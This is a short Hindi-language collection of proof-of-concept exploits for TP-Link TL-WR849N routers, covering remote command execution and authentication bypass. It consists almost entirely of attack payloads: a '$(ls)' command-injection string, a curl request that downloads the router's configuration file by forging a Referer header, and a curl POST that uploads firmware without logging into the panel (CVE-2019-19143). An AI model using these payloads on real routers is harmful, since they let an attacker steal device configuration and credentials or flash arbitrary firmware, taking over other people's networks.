
TP-Link राउटर्स के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट्स, जिनमें रिमोट कमांड निष्पादन और प्रमाणीकरण बायपास कमजोरियाँ शामिल हैं।
पेलोड: "$(ls)"
TP LINK TL-WR849N - रिमोट कमांड निष्पादन PoC
पेलोड:
curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
पैनल तक पहुंच के बिना नया फर्मवेयर अपलोड करना
[CVE-2019-19143] फर्मवेयर अपडेट: पैनल तक पहुंच के बिना नया फर्मवेयर अपलोड करना
पेलोड:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F [email protected] http://192.168.0.2/cgi/confup